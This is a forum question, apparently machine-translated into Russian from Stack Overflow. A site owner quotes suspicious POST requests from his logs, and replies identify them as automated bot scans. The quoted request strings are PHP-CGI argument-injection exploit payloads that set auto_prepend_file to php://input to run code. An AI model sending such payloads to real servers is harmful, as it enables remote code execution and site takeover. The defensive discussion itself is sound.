Я предоставлю этот вопрос, сказав, что я НЕ веб-разработчик, и у меня нет больших знаний в этой области. Я являюсь владельцем бизнеса и имею сайт с небольшим объемом, на который мои клиенты покупают товары. Я заметил этот набор запросов несколько минут назад, и они кажутся мне очень подозрительными, мирянами. Похоже, что они пытаются вытащить данные из моей базы данных? Я мог быть совершенно неправ, но кто-то, пожалуйста, сообщите мне, что они думают здесь.Находит ли мой сайт? Моделирование Suhosin, очень странная деятельность в IP-журнале
Примечания:
- Все они перечислены с методом POST, когда большинство нормальных зрителей перечислены ГЭТ.
- все ниже происходит сразу после моего доменного имени, например. examplesite.com/xxxxxxxx
Вот запросы:
/cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin%2Esimulation%3Don+-d+disable_functions%3D""+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi%2Eforce_redirect%3D0+-d+cgi%2Eredirect_status_env%3D0+-n
/cgi-bin/php5?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin%2Esimulation%3Don+-d+disable_functions%3D""+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi%2Eforce_redirect%3D0+-d+cgi%2Eredirect_status_env%3D0+-n
/cgi-bin/php4?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin%2Esimulation%3Don+-d+disable_functions%3D""+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi%2Eforce_redirect%3D0+-d+cgi%2Eredirect_status_env%3D0+-n
И около 6 больше подобных запросов.
Примечания: когда я следую за этой ссылкой, мой сайт предлагает ошибку страницы не найден. Когда я пытаюсь перейти на сайт site.com/cgi-bin/, я получаю 403 запрещенную ошибку от моего хоста.
Мысли, пожалуйста? Я здесь параноик?
Редактировать: Кроме того, в моем файловом менеджере моя папка cgi-bin пуста: «этот каталог пуст».
Stackoverflow предназначен только для программирования вопросов, я рекомендую попробовать вместо этого http://serverfault.com/. – kviiri
@ kviiri Этот вопрос относится к безопасности на уровне приложений и, по моему мнению, достаточно для темы StackOverflow. – Brad
Если вы не получите фактический 500/успешный запрос при попытке посетить URL-адреса, тогда все будет в порядке. Это просто автоматические боты, пытающиеся найти сайты с определенной уязвимостью доступа к PHP CGI. –